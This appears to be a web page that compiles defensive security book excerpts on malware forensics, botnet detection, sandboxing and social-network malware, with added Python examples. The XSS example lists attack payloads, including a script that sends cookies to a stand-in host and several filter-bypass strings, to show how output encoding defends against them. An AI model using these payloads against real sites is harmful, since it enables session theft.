Which type of antimalware software recognizes various characteristics of known malware files

Introduction

Cameron Malin, ... James Aquilina, in Linux Malware Incident Response, 2013

Applying Forensics to Malware
Forensic analysis of malware requires an understanding of how to distinguish class from individuating characteristics of malware.

Class Versus Individuating Characteristics

It is simply not possible to be familiar with every kind of malware in all of its various forms.

Best investigative effort will include a comparison of unknown malware with known samples, as well as the conduct of preliminary analysis designed not just to identify the specimen, but how best to interpret it.

Although libraries of malware samples currently exist in the form of antivirus programs and hash sets, these resources are far from comprehensive.

Individual investigators instead must find known samples to compare with evidence samples and focus on the characteristics of files found on the compromised computer to determine what tools the intruder used. Further, deeper examination of taxonomic and phylogenetic relationships between malware specimens may be relevant to classify a target specimen and determine if it belongs to a particular malware “family.”

Once an exemplar is found that resembles a given piece of digital evidence, it is possible to classify the sample. John Thornton describes this process well in “The General Assumptions and Rationale of Forensic Identification”:22

In the “identification” mode, the forensic scientist examines an item of evidence for the presence or absence of specific characteristics that have been previously abstracted from authenticated items. Identifications of this sort are legion, and are conducted in forensic laboratories so frequently and in connection with so many different evidence categories that the forensic scientist is often unaware of the specific steps that are taken in the process. It is not necessary that those authenticated items be in hand, but it is necessary that the forensic scientist have access to the abstracted information. For example, an obscure 19th Century Hungarian revolver may be identified as an obscure 19th Century Hungarian revolver, even though the forensic scientist has never actually seen one before and is unlikely ever to see one again. This is possible because the revolver has been described adequately in the literature and the literature is accessible to the scientist. Their validity rests on the application of established tests which have been previously determined to be accurate by exhaustive testing of known standard materials.

In the “comparison” mode, the forensic scientist compares a questioned evidence item with another item. This second item is a “known item.” The known item may be a standard reference item which is maintained by the laboratory for this purpose (e.g. an authenticated sample of cocaine), or it may be an exemplar sample which itself is a portion of the evidence in a case (e.g. a sample of broken glass or paint from a crime scene). This item must be in hand. Both questioned and known items are compared, characteristic by characteristic, until the examiner is satisfied that the items are sufficiently alike to conclude that they are related to one another in some manner.

In the comparison mode, the characteristics that are taken into account may or may not have been previously established. Whether they have been previously established and evaluated is determined primarily by (1) the experience of the examiner, and (2) how often that type of evidence is encountered. The forensic scientist must determine the characteristics to be before a conclusion can be reached. This is more easily said than achieved, and may require de novo research in order to come to grips with the significance of observed characteristics. For example, a forensic scientist compares a shoe impression from a crime scene with the shoes of a suspect. Slight irregularities in the tread design are noted, but the examiner is uncertain whether those features are truly individual characteristics unique to this shoe, or a mold release mark common to thousands of shoes produced by this manufacturer. Problems of this type are common in the forensic sciences, and are anything but trivial.

The source of a piece of malware is itself a unique characteristic that may differentiate one specimen from another.

Being able to show that a given sample of digital evidence originated on a suspect’s computer could be enough to connect the suspect with the crime.

The denial of service attack tools that were used to attack Yahoo! and other large Internet sites, for example, contained information useful in locating those sources of attacks.

As an example, IP addresses and other characteristics extracted from a distributed denial of service attack tool are shown in Fig. I.1.

Figure I.1. Individuating characteristics in suspect malware.

The sanitized IP addresses at the end indicated where the command and control servers used by the malware were located on the Internet, and these command and control systems may have useful digital evidence on them.

Class characteristics may also establish a link between the intruder and the crime scene. For instance, the “t0rn” installation file contained a username and port number selected by the intruder shown in Fig. I.2.

Figure I.2. Class characteristics in suspect malware.

If the same characteristics are found on other compromised hosts or on a suspect’s computer, these may be correlated with other evidence to show that the same intruder was responsible for all of the crimes and that the attacks were launched from the suspect’s computer. For instance, examining the computer with IP address 192.168.0.7 used to break into 192.168.0.3 revealed the following traces (Fig. I.3) that help establish a link.

Figure I.3. Examining multiple victim systems for similar artifacts.

Be aware that malware developers continue to find new ways to undermine forensic analysis. For instance, we have encountered the following antiforensic techniques in Linux malware (although this list is by no means exhaustive and will certainly develop with time):

Multicomponent

Conditional and obfuscated code

Packing and encryption

Detection of debuggers, disassemblers, and virtual environments

Stripping symbolic and debug information during the course of compiling an ELF file

A variety of tools and techniques are available to digital investigators to overcome these antiforensic measures, many of which are detailed in this book. Note that advanced antiforensic techniques require knowledge and programming skills that are beyond the scope of this book. More in-depth coverage of reverse engineering is available in The IDA Pro Book: The Unofficial Guide to the World’s Most Popular Disassembler.23

URL: https://www.sciencedirect.com/science/article/pii/B9780124095076000042

Introduction

In Malware Forensics Field Guide for Linux Systems, 2014

Class Versus Individuating Characteristics

▸ It is simply not possible to be familiar with every kind of malware in all of its various forms.

Best investigative effort will include a comparison of unknown malware with known samples, as well as the conduct of preliminary analysis designed not just to identify the specimen, but how best to interpret it.

Although libraries of malware samples currently exist in the form of anti-virus programs and hashsets, these resources are far from comprehensive.

Individual investigators instead must find known samples to compare with evidence samples and focus on the characteristics of files found on the compromised computer to determine what tools the intruder used. Further, deeper examination of taxonomic and phylogenetic relationships between malware specimens may be relevant to classify a target specimen and determine if it belongs to a particular malware “family.”

▸ Once an exemplar is found that resembles a given piece of digital evidence, it is possible to classify the sample. John Thornton describes this process well in “The General Assumptions and Rationale of Forensic Identification”:44

In the “identification” mode, the forensic scientist examines an item of evidence for the presence or absence of specific characteristics that have been previously abstracted from authenticated items. Identifications of this sort are legion, and are conducted in forensic laboratories so frequently and in connection with so many different evidence categories that the forensic scientist is often unaware of the specific steps that are taken in the process. It is not necessary that those authenticated items be in hand, but it is necessary that the forensic scientist have access to the abstracted information. For example, an obscure 19th Century Hungarian revolver may be identified as an obscure 19th Century Hungarian revolver, even though the forensic scientist has never actually seen one before and is unlikely ever to see one again. This is possible because the revolver has been described adequately in the literature and the literature is accessible to the scientist. Their validity rests on the application of established tests which have been previously determined to be accurate by exhaustive testing of known standard materials.

In the “comparison” mode, the forensic scientist compares a questioned evidence item with another item. This second item is a “known item.” The known item may be a standard reference item which is maintained by the laboratory for this purpose (e.g. an authenticated sample of cocaine), or it may be an exemplar sample which itself is a portion of the evidence in a case (e.g., a sample of broken glass or paint from a crime scene). This item must be in hand. Both questioned and known items are compared, characteristic by characteristic, until the examiner is satisfied that the items are sufficiently alike to conclude that they are related to one another in some manner.

In the comparison mode, the characteristics that are taken into account may or may not have been previously established. Whether they have been previously established and evaluated is determined primarily by (1) the experience of the examiner, and (2) how often that type of evidence is encountered. The forensic scientist must determine the characteristics to be before a conclusion can be reached. This is more easily said than achieved, and may require de novo research in order to come to grips with the significance of observed characteristics. For example, a forensic scientist compares a shoe impression from a crime scene with the shoes of a suspect. Slight irregularities in the tread design are noted, but the examiner is uncertain whether those features are truly individual characteristics unique to this shoe, or a mold release mark common to thousands of shoes produced by this manufacturer. Problems of this type are common in the forensic sciences, and are anything but trivial.

▸ The source of a piece of malware is itself a unique characteristic that may differentiate one specimen from another.

Being able to show that a given sample of digital evidence originated on a suspect’s computer could be enough to connect the suspect with the crime.

The denial of service attack tools that were used to attack Yahoo! and other large Internet sites, for example, contained information useful in locating those sources of attacks.

As an example, IP addresses and other characteristics extracted from a distributed denial of service attack tool are shown in Figure I.5.

FIGURE I.5. Individuating characteristics in suspect malware

The sanitized IP addresses at the end indicated where the command and control servers used by the malware were located on the Internet, and these command and control systems may have useful digital evidence on them.

▸ Class characteristics may also establish a link between the intruder and the crime scene. For instance, the “t0rn” installation file contained a username and port number selected by the intruder shown in Figure I.6.

FIGURE I.6. Class characteristics in suspect malware

▸ If the same characteristics are found on other compromised hosts or on a suspect’s computer, these may be correlated with other evidence to show that the same intruder was responsible for all of the crimes and that the attacks were launched from the suspect’s computer. For instance, examining the computer with IP address 192.168.0.7 used to break into 192.168.0.3 revealed the following traces (Figure I.7) that help establish a link.

FIGURE I.7. Examining multiple victim systems for similar artifacts

▸ Be aware that malware developers continue to find new ways to undermine forensic analysis. For instance, we have encountered the following anti-forensic techniques in Linux malware (although this list is by no means exhaustive and will certainly develop with time):

Multicomponent

Conditional and obfuscated code

Packing and encryption

Detection of debuggers, disassemblers, and virtual environments

Stripping symbolic and debug information during the course of compiling an ELF file

▸ A variety of tools and techniques are available to digital investigators to overcome these anti-forensic measures, many of which are detailed in this book. Note that advanced anti-forensic techniques require knowledge and programming skills that are beyond the scope of this book. More in-depth coverage of reverse engineering is available in The IDA Pro Book: The Unofficial Guide to the World’s Most Popular Disassembler.45 A number of other texts provide details on programming rootkits and other malware.46

From Malware Analysis to Malware Forensics

The blended malware threat has arrived; the need for in-depth, verifiable code analysis and formalized documentation has arisen, and a new forensic discipline has emerged.

▸ In the good old days, digital investigators could discover and analyze malicious code on computer systems with relative ease. UNIX rootkits like t0rnkit did little to undermine forensic analysis of the compromised system. Because the majority of malware functionality was easily observable, there was little need for a digital investigator to perform in-depth analysis of the code. In many cases, someone in the information security community would perform a basic functional analysis of a piece of malware and publish it on the Web.

▸ While the malware of yesteryear neatly fell into distinct categories based upon functionality and attack vector (viruses, worms, Trojan Horses), today’s malware specimens are often modular, multifaceted, and known as blended-threats because of their diverse functionality and means of propagation.47 And, as computer intruders become more cognizant of digital forensic techniques, malicious code is increasingly designed to obstruct meaningful analysis.

▸ By employing techniques that thwart reverse engineering, encode and conceal network traffic, and minimize the traces left on file systems, malicious code developers are making both discovery and forensic analysis more difficult. This trend started with kernel loadable rootkits on UNIX and has evolved into similar concealment methods on Windows and Linux systems.

▸ Today, various forms of malware are proliferating, automatically spreading (worm behavior), providing remote control access (Trojan horse/backdoor behavior), and sometimes concealing their activities on the compromised host (rootkit behavior). Furthermore, malware has evolved to pollute cross-platform, cloud, and BYOD environments; undermine security measures; disable anti-virus tools; and bypass firewalls by connecting from within the network to external command and control servers.

▸ One of the primary reasons that developers of malicious code are taking such extraordinary measures to protect their creations is that, once the functionality of malware has been decoded, digital investigators know what traces and patterns to look for on the compromised host and in network traffic. In fact, the wealth of information that can be extracted from malware has made it an integral and indispensable part of intrusion investigation and identity theft cases. In many cases, little evidence remains on the compromised host and the majority of useful investigative information lies in the malware itself.

▸ The growing importance of malware analysis in digital investigations, and the increasing sophistication of malicious code, has driven advances in tools and techniques for performing surgery and autopsies on malware. As more investigations rely on understanding and counteracting malware, the demand for formalization and supporting documentation has grown. The results of malware analysis must be accurate and verifiable, to the point that they can be relied on as evidence in an investigation or prosecution. As a result, malware analysis has become a forensic discipline—welcome to the era of malware forensics.

URL: https://www.sciencedirect.com/science/article/pii/B9781597494700020015

Most Attacks Are Targeted

Bill Gardner, in Building an Information Security Awareness Program, 2014

Common Attack Vectors: Common Results

The common thread in Operation Aurora, Operation Shady RAT, and the targeted attacks against RSA and defense contractors is that they all used highly targeted spear phishing to infect the organizations with previously unknown malware, which then siphoned confidential information and intellectual property out of each organization. The other commonality is that these organizations had spent millions, if not tens of millions, of dollars on antivirus, intrusion detection systems, intrusion prevention systems, and other information security defenses, and all of it was circumvented by someone inside the organization simply opening a link or an attachment in an e-mail, which led to the compromise of their entire enterprise networks.

All organizations, no matter how large or small, contain information that is of interest to attackers, and attackers will use any means possible to get to that information. Smaller breaches go unreported because the organization does not know it has been breached or does not want to admit to business partners and customers that it has lost data. State breach notification laws were intended to address part of this underreporting problem. Just because your organization is small or midsized does not mean that you have no information of value. In fact, like most organizations, your security program is likely underbudgeted and understaffed, while attackers are well funded and fully staffed with highly trained people. You are being targeted. Implementing a security awareness program is your best defense against these well-funded, determined attackers.

URL: https://www.sciencedirect.com/science/article/pii/B9780124199675000041

Mining Android Apps for Anomalies

Konstantin Kuznetsov, ... Andreas Zeller, in The Art and Science of Analyzing Software Data, 2015

10.6 Conclusion and Future Work

By clustering apps according to description topics and identifying outliers by API usage within each cluster, our CHABADA approach effectively identifies applications whose behavior would be unexpected given their description. In [1] we identified several examples of false and misleading advertising; and as a side effect, obtained a novel effective detector for yet unknown malware. This chapter presented several improvements on the original technique and thus introduces a more powerful malware detector.

In the future we plan to provide better techniques to cluster applications according to their descriptions. This should improve the ability of CHABADA to identify relevant abnormal behaviors. Furthermore, we plan to integrate dynamic information in the approach, thus overcoming the known limitations of static analysis.

The dataset we used for our evaluation, as well as a list of more detailed results, are available on the CHABADA website: http://www.st.cs.uni-saarland.de/appmining/chabada/.

URL: https://www.sciencedirect.com/science/article/pii/B9780124115194000100

Botnet Detection: Tools and Techniques

Craig A. Schiller, ... Michael Cross, in Botnets, 2007

Intrusion Detection

Intrusion detection systems (IDSes) are either host or network based. A NIDS should focus on local and outgoing traffic flows as well as incoming Internet traffic, whereas a HIDS can pick up symptoms of bot activity at a local level that can't be seen over the network.

At either level, an IDS can focus on either anomaly detection or signature detection, though some are more or less hybrid.

IDS is important, but it should be considered part of an intrusion prevention strategy, whether as part of a full-blown commercial system or as one element of a multilayered defense.

Virus detection is, or should be, an understatement: It should sit at all levels of the network, from the perimeter to the desktop, and include preventative and recovery controls, not just detection.

Antivirus is capable of detecting a great deal more than simple viruses and is not reliant on simple detection of static strings. Scanners can detect known malware with a very high degree of accuracy and can cope with a surprisingly high percentage of unknown malware, using heuristic analysis.

However, bots are not only capable of sophisticated evasion techniques but also present dissemination-related difficulties that are not susceptible to straightforward technical solutions at the code analysis level.

There is a place for open-source antivirus as a supplement to commercial solutions, but it's not a direct replacement; it can't cover the same range of threats (especially older threats), even without considering support issues.

Snort is a signature-based NIDS with a sophisticated approach to rule sets, in addition to its capabilities as a packet sniffer and logger.

As well as writing your own Snort signatures, you can tap into a rich vein of signatures published by a huge group of Snort enthusiasts in the security community.

The flexibility of the signature facility is illustrated by four example signatures, one of which could almost be described as adding a degree of anomaly detection to the rule set.

Tripwire is an integrity management tool that uses a database of file signatures (message digests or checksums, not attack signatures) to detect suspicious changes to files.

The database can be kept more secure by keeping it on read-only media and using MD5 or Snefru message digests.

The open-source version of Tripwire is limited in the platforms it covers. If the devices you want to protect are all POSIX compliant and you're not bothered about value-adds like support and enterprise-level management, and if you're happy to do some DIY, it might do very well.

Ken Thompson's “Reflections on Trusting Trust” makes the point that you can't have absolute trust in any code you didn't build from scratch yourself, including your compiler. This represents a weakness in an application that relies for its effectiveness on being installed to an absolutely clean environment.
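As an added illustration of the integrity-database idea in the Tripwire points above (example code written for this page, not Tripwire's own), the following Python script builds a baseline of per-file digests for a directory tree and then reports files that were added, removed or modified on a later scan. It uses SHA-256 rather than the MD5 the text mentions, the chmod on the saved baseline is a weaker stand-in for the read-only media the text recommends, and the demo tree with its file contents is constructed.

```python
"""Tripwire-style file integrity check (added example, not Tripwire's own code).

A baseline of per-file message digests is built from a known-good tree and later
compared against a fresh scan to report added, removed and modified files.
SHA-256 is used instead of MD5 because MD5 collisions can be produced deliberately.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def digest_file(path: Path, chunk_size: int = 65536) -> str:
    """Return the hex SHA-256 of a file, streamed so large files fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every regular file under root (relative POSIX path) to its digest and size.
    Symlinks are skipped so a link pointing elsewhere cannot stand in for a file."""
    root_path = Path(root)
    baseline = {}
    for path in sorted(root_path.rglob("*")):
        if path.is_file() and not path.is_symlink():
            rel = path.relative_to(root_path).as_posix()
            baseline[rel] = {"sha256": digest_file(path), "size": path.stat().st_size}
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Classify the differences between two scans into added/removed/modified paths."""
    base_keys, cur_keys = set(baseline), set(current)
    modified = sorted(
        p for p in base_keys & cur_keys if baseline[p]["sha256"] != current[p]["sha256"]
    )
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": modified,
    }


def save_baseline(baseline: dict, dest: str) -> None:
    """Write the baseline as JSON and drop write permission; on a real deployment the
    file would live on read-only media, as the text advises, since an attacker who
    can rewrite the database can simply re-baseline the trojaned files."""
    with open(dest, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)
    os.chmod(dest, 0o444)


def load_baseline(src: str) -> dict:
    with open(src) as f:
        return json.load(f)


def check_tree(root: str, baseline_file: str) -> dict:
    """Rescan root and report deviations from the stored baseline."""
    return compare(load_baseline(baseline_file), build_baseline(root))


def run_demo() -> dict:
    """Constructed demo: baseline a small tree, tamper with it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "tree"
        (tree / "bin").mkdir(parents=True)
        (tree / "bin" / "ls").write_bytes(b"original ls binary")   # constructed content
        (tree / "etc.conf").write_text("port=22\n")
        db = str(Path(tmp) / "baseline.json")
        save_baseline(build_baseline(str(tree)), db)

        (tree / "bin" / "ls").write_bytes(b"replaced ls binary")   # modified
        (tree / "bin" / "extra").write_bytes(b"new file")           # added
        (tree / "etc.conf").unlink()                                # removed
        result = check_tree(str(tree), db)
        os.chmod(db, 0o644)  # let the temporary directory clean up on any platform
        return result


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```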

URL: https://www.sciencedirect.com/science/article/pii/B978159749135850007X

Building a Sandbox

In Virtualization for Security, 2009

Solutions Fast Track

Sandbox Background

Sandboxes are a common tool in security/malware research; they allow the execution of unknown software in a controlled, restricted, and monitored environment.

CWSandbox is an example of a sandbox tool for automatic behavior analysis of Windows executables; the functionality of a sandbox is achieved by taking the following steps:

1. The initial malware process is created by the starter application cwsandbox.exe.

2. cwmonitor.dll is injected into each monitored process.

3. The DLL installs API hooks for all important functions of the Windows API.

4. If a new process is started by the malware or an existing one is infected, this process is also monitored.

5. After a customizable time all monitored processes are terminated/stopped.

6. A high-level summarized analysis report is created of all the monitored actions.

7. The network traffic is examined, important Web protocols (HTTP, FTP, IRC, and so on) are recognized, and all relevant protocol data is reported (username, password, and so on).

Existing Sandbox Implementations

Norman SandBox was developed by Norman AS. at http://sandbox.norman.no.

TTAnalyze was developed by Ulrich Bayer, Ikarus Software GmbH, in cooperation with the Technical University of Vienna.

In Chas Tomlin's Sandnet the malicious software is executed on a real Windows system, not on an emulated or simulated one.

Truman is The Reusable Unknown Malware Analysis Net, by Joe Stewart from LURHQ.

CWSandbox is from the diploma thesis of Carsten Willems.

Describing CWSandbox

CWSandbox is an application for the automatic behavior analysis of malware. This dynamic analysis is performed by executing the malicious application in a controlled environment and capturing all of its relevant calls to the Windows API.

CWSandbox is designed to attach reporting tools to malware. It is not designed to block malicious activity of the malware. You are responsible for blocking any outbound traffic that may result from executing the malware.

Malware may be able to detect the presence of a virtual environment by checking specific registry entries, the list of running processes or system services, or typical behavior of the system. Many detection methods are known for the popular VMware product. The website www.trapkit.de describes a lot of them and also offers the tools scoopy doo and jerry for that purpose. Joanna Rutkowska described a generic approach to VM detection which she called redpill. Redpill checks the IDT address, which differs when running in a virtual machine from that on a real system. This trick works with any virtualization software.

Sandbox technology can be extended to serve as a tool for automatic collection and analysis of malware, as in Automated Analysis Suite (AAS).

AAS uses a database to store malware samples and the corresponding analysis reports.

AAS integrates the honeypot tool Nepenthes for automatic malware collection.

Additionally, malware can be submitted via a PHP-based Web interface.

AAS embeds CWSandbox for automatic analysis.

Creating a Live DVD with VMware and CWSandbox

Once you have created a sandbox, you can turn that implementation into a bootable DVD so that you can take the sandbox into the field or distribute the tool to a classroom of students to give them hands-on malware analysis experience.

Frequently Asked Questions

Q: What kind of things can you find using sandbox technology?

A: You are only limited by the instruments that you attach to the malware. You can learn the IP addresses or FQDNs of different members of a botnet, the identity of command and control servers, malicious code download servers, the nickname, userid and password of bot command and control servers, unpacked and unencrypted versions of stealth malware, the filenames of files that are part of the malicious system, a list of all files opened by the malware, and more.

Q: I really like the Live DVD idea. How can I create my own Live-CDs and DVDs using other content?

A: Instructions for creating your own Live-CDs and DVDs can be found on howtoforge. We used a how-to written by Falko Timme, “Creating Your Own Custom Ubuntu 7.10 Or Linux Mint 4.0 Live-CD With Remastersys,” Copyright © 2008 HowtoForge.

Q: What does virtualization do for Sandbox technology?

A: Virtualization makes it possible for a security investigator to try multiple tests on a malware sample without having to wipe the test system's hard drive between test sessions. Without virtualization, the measures to ensure integrity could be provided using reverting tools such as DeepFreeze, Partimage, or hardware restore solutions. The virtual environment permits investigators to create several members of a network to examine the interaction of a botnet.

Q: I don't want to give away my licensed copies of Windows or CWSandbox. How do I create a Live DVD that doesn't include my license keys?

A: You can use SYSPREP and the process described at http://www.uea.ac.uk/itcs/software/xp/xp-sysprep.html to remove the product keys so that a new owner of the DVD can use their own product keys. If you created the image file after you installed the sandbox but before you entered the license, then the new owner of the DVD will need to provide their own license or add a different sandbox product.

Notes

1

For more information go to http://sandbox.norman.no/pdf/03%20sandboxwhitepaper.pdf.

2

This utility saves/restores hard disk partitions in many formats to an image file (see www.partimage.org).

3

This tool resets your computer to its original state (see www.faronics.com/html/deepfreeze.asp).

4

Right-click on free space on /dev/sda or /dev/hda to create partitions in the free space.


URL: https://www.sciencedirect.com/science/article/pii/B9781597493055000037

Malware Attacks

Carl Timm, Richard Perez, in Seven Deadliest Social Network Attacks, 2010

Protecting Yourself

Malware, XSS, and CSRF are not going away. These attacks are constantly changing and becoming more prevalent every day. With the advent of social network sites, attackers have another medium through which to deploy malware and perform XSS and CSRF exploits.

The sheer number of users who frequent these sites, combined with the trust associated with them, makes social networks a very attractive medium for attackers. Social networks are not going away, and we are not going to stop using them. So we had better figure out how to protect ourselves while using them.

This section is going to be divided into three parts: Malware Defense, Cross-Site Scripting Defense, and Cross-Site Request Forgery Defense. In each section, we will explore the different countermeasures available to us to mitigate these different attacks.

Mitigating Malware

As we've learned, there is a vast variety of malware. The question is, “How can we protect ourselves?” The first and foremost protection is knowledge. That is a vague statement, so to be concrete: keep yourself up to date on the malware currently running rampant. This can be accomplished by reading trade magazines, attending courses on hacking techniques, and frequenting sites such as CERT at www.cert.org, to name a few.

Knowledge is the first step in any defense. From a defender's point of view there are really two types of malware to protect against: malware that is known and malware that is not yet known. Protecting ourselves against known malware is not all that complicated. The following steps protect against known malware; additional items for corporations follow:

Don't click on unknown links.

Never open e-mail attachments from people you don't know.

Do not accept friends you don't know.

Do not use applications you are not familiar with.

Ensure you configure your privacy settings.

Install and run antivirus software.

Keep antivirus software up-to-date with the latest signature updates.

Scan all downloaded files with antivirus software before opening or running them.

Install and run antispyware software.

Keep the signature files for antispyware software up-to-date.

Utilize the most up-to-date patches for your software.

Do not use any storage media that has been used in another computer unless you are certain that computer is free of viruses and will not pass a virus on to your system.

Install and run local firewalls on your desktops and laptops.

Additional items for corporations:

Implement a security awareness program.

Utilize network-based intrusion detection/prevention systems at entry points to your environment and around critical systems.

Utilize host-based intrusion detection/prevention software on your critical servers.

Utilize Web filtering proxies to limit the Web sites employees can visit.

Utilize Web malware filtering to scan traffic for malware and inappropriate links.

Limit the use of instant messaging software.

Limit the use of peer-to-peer networks.

This list is only a portion of the tools that can be used to protect a corporation. To truly implement security in a corporate environment, one first needs to create a security policy that states the corporation's position on security.

Tip

It may be a little confusing to differentiate between antispyware software and antivirus software. Antivirus software is primarily used to scan a hard disk for viruses, worms, and Trojan horses, and it removes, repairs, or quarantines any threats it finds. Antispyware software scans your hard disk and registry for traces of spyware and adware and then either removes them or prompts the user to remove them. The real difference between antivirus and antispyware lies in what the software is looking for. Today antivirus software is offered with antispyware add-ons, and antispyware software is offered with antivirus add-ons. It is still recommended to install one antivirus product and a separate antispyware product.

As simple and sensible as these protection mechanisms may seem, a good number of people still do not use them. What is harder to defend against is unknown malware. Unknown malware is just that: malware that has not been discovered yet. Attacks using it are known as zero-day attacks, which means that no antivirus or antispyware signatures exist for it. Also, once new malware has been detected, there is still a lag between the time it is detected and when a signature becomes available. So, how can we protect ourselves against unknown malware?

There are a multitude of methods and products that can be utilized in the defense of unknown malware. Some of the more common methods include the following:

Utilize network-based intrusion prevention systems.

Utilize host-based intrusion prevention software.

Restrict administrative rights.

Utilize products that can enforce a blacklist and a whitelist. A blacklist is a list of sites that are not trusted, whereas a whitelist is a list of trusted sites.

Disable active content, such as ActiveX.

Utilize multiple versions of antivirus and antispyware software. What one vendor's software misses the other may detect.

Lock down USB ports. USB drives used on other devices may contain viruses.

Disable unneeded services. Attackers are aware of the different default services running on operating systems. They can use these services as a means of infecting a system. Disabling unneeded services will reduce one's chance of being infected.

Warning

Intrusion prevention systems use an anomaly-based method to detect zero-day attacks. The way this works is by placing the intrusion prevention system in what is commonly referred to as “learning mode.” During learning mode the system learns what the “normal” communications are in the environment. Once moved from “learn mode” to “protect mode,” the system allows “normal” communications and blocks the anomalous traffic. This sounds good in theory; however, what the system considers “normal” communications may not be what your company considers “normal” communications. If this is the case, a large amount of company traffic could be blocked. Bear in mind, too, that anything already happening during the learning window, including an existing infection's command-and-control traffic, is learned as “normal.” So, when implementing intrusion prevention systems, the results of the learn mode should be reviewed and tweaked to match the actual “normal” traffic for your environment before switching to protect mode.

Once again, this list covers only some of the most common mitigation techniques. It is by no means exhaustive and should not be taken that way. Implementing these techniques will reduce the chance of infection; however, it will not eliminate the possibility. Nothing can ever guarantee that one will not become infected.
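The learn-mode/protect-mode cycle and the review step the warning above calls for, as an added example in Python that is not part of the chapter. The flow records, host names and ports are constructed; a real IPS would build its baseline from NetFlow or a packet tap. The example deliberately plants two problems in the learning window: a legitimate backup job that never ran while the system was learning, and a host that was already beaconing to an IRC port, so that the difference between an unreviewed and a reviewed baseline shows up in the decisions.

```python
from collections import Counter

# Constructed learning-window traffic as (source host, destination, dst port).
# Two things are wrong with this window, on purpose: the weekend backup job
# (ws-01 -> backup:22) never ran while we were learning, and ws-04 was
# already talking to an external IRC port (6667, a classic bot C2 channel).
LEARN_TRAFFIC = (
    [("ws-01", "web", 443)] * 3 + [("ws-02", "web", 443)] * 2
    + [("ws-01", "dns", 53)] * 4 + [("ws-02", "dns", 53)] * 4
    + [("ws-01", "mail", 25)] * 2
    + [("ws-04", "203.0.113.7", 6667)]
)

IRC_C2 = ("ws-04", "203.0.113.7", 6667)
BACKUP = ("ws-01", "backup", 22)


class AnomalyIPS:
    """Minimal anomaly-based IPS: whatever is seen in learn mode is 'normal'."""

    def __init__(self):
        self.seen = Counter()
        self.baseline = set()
        self.mode = "learn"

    def learn(self, flows):
        if self.mode != "learn":
            raise RuntimeError("cannot learn in protect mode")
        self.seen.update(flows)
        self.baseline = set(self.seen)

    def rare_flows(self, threshold=2):
        """Flows seen fewer than `threshold` times: the analyst's review list."""
        return sorted(f for f, n in self.seen.items() if n < threshold)

    def allow(self, flow):
        self.baseline.add(flow)

    def deny(self, flow):
        self.baseline.discard(flow)

    def protect(self):
        self.mode = "protect"

    def decide(self, flow):
        if self.mode != "protect":
            raise RuntimeError("not in protect mode")
        return "allow" if flow in self.baseline else "block"


def unreviewed_ips():
    """Learn mode straight into protect mode, with no analyst review."""
    ips = AnomalyIPS()
    ips.learn(LEARN_TRAFFIC)
    ips.protect()
    return ips


def reviewed_ips():
    """Same baseline, but tweaked by an analyst before protect mode."""
    ips = AnomalyIPS()
    ips.learn(LEARN_TRAFFIC)
    for flow in ips.rare_flows():
        if flow[2] == 6667:      # IRC to an external host is not "normal" here
            ips.deny(flow)
    ips.allow(BACKUP)            # legitimate job the learning window missed
    ips.protect()
    return ips


PROBES = [
    ("ws-01", "web", 443),            # learned, normal
    BACKUP,                           # only allowed after review
    IRC_C2,                           # baselined by mistake, denied after review
    ("ws-02", "198.51.100.9", 4444),  # never seen: blocked either way
]


def decisions(ips):
    return {flow: ips.decide(flow) for flow in PROBES}


if __name__ == "__main__":
    for label, ips in (("unreviewed", unreviewed_ips()), ("reviewed", reviewed_ips())):
        print(label)
        for flow, verdict in decisions(ips).items():
            print(f"  {verdict:5s} {flow}")
```

Without review the unreviewed baseline allows the C2 beacon and blocks the backup job; the reviewed baseline inverts both decisions. The rare-flow list is the cheapest place to start a review, but it is not sufficient on its own: a frequent C2 beacon would not appear on it, which is why the baseline itself should be compared against what the business knows to be normal.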

Mitigating Cross-Site Scripting Attacks

XSS is a very nasty attack technique. As mentioned earlier, much of the mitigation of XSS resides with the social networks themselves. However, we are not going to leave the end user hanging out to dry. There are still some things we can do to help protect ourselves. To begin with, we should do all of the following:

Disable scripting when it is not required.

Disable cookies.

Disable active content, such as ActiveX.

Do not trust links to other sites unless you know they are safe.

Do not trust links in e-mails unless you know they are safe.

Do not follow links from sites that lead to security-sensitive pages involving personal or business information unless you truly trust them.

Access sites directly rather than through third-party sites.

Utilize desktop firewalls.

Utilize host-based intrusion prevention software.

This list covers just some of the things one can do to reduce the risk of an XSS attack. A company can help mitigate XSS by doing the following:

Implement application layer firewalls.

Implement network-based intrusion prevention systems.

Implement Web content filters.

Disallow the use of instant messaging.

Implement application layer proxies.

Disallow the use of peer-to-peer software.

Perform application vulnerability scans.

Perform application code reviews.

These are just some of the mitigation techniques that can reduce one's chance of being hit by an XSS attack. The unfortunate reality is that there is little the user can do beyond being smart about what they are doing. It really falls on the Web sites and social networks to make sure that they have reviewed their code for vulnerabilities, encode user data correctly on output rather than relying on ad hoc filters, and deployed other mitigations such as application firewalls.
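What “reviewed their code” and “proper filters” come down to on the server side, as an added example in Python that is not from the chapter. The payloads are constructed attacker input such as a profile field on a social network; the three renderers are hypothetical and stand in for a page template. The example contrasts raw concatenation, a naive strip-the-tag filter of the kind that is routinely bypassed, and context-correct HTML encoding of the data at output time with the standard library's `html.escape`.

```python
import html
import re

# Constructed attacker input as it might arrive in a profile field or query parameter.
PAYLOADS = [
    '<script>document.location="http://203.0.113.5/?c="+document.cookie</script>',
    '<SCRIPT>alert(1)</SCRIPT>',                    # case bypass of a naive filter
    '<scr<script>ipt>alert(1)</scr</script>ipt>',   # nesting bypass of a strip filter
    '" onmouseover="alert(1)',                      # attribute-context injection, no tags
]


def render_unsafe(name):
    """Vulnerable: user input concatenated straight into HTML."""
    return f'<p>Hello, {name}!</p><input value="{name}">'


def naive_filter(name):
    """A 'filter' that only strips the literal lowercase <script> tags."""
    return name.replace("<script>", "").replace("</script>", "")


def render_naive(name):
    return render_unsafe(naive_filter(name))


def render_safe(name):
    """Hardened: encode for the HTML context at output time.
    quote=True also escapes \" and ' so the attribute context is safe too."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello, {safe}!</p><input value="{safe}">'


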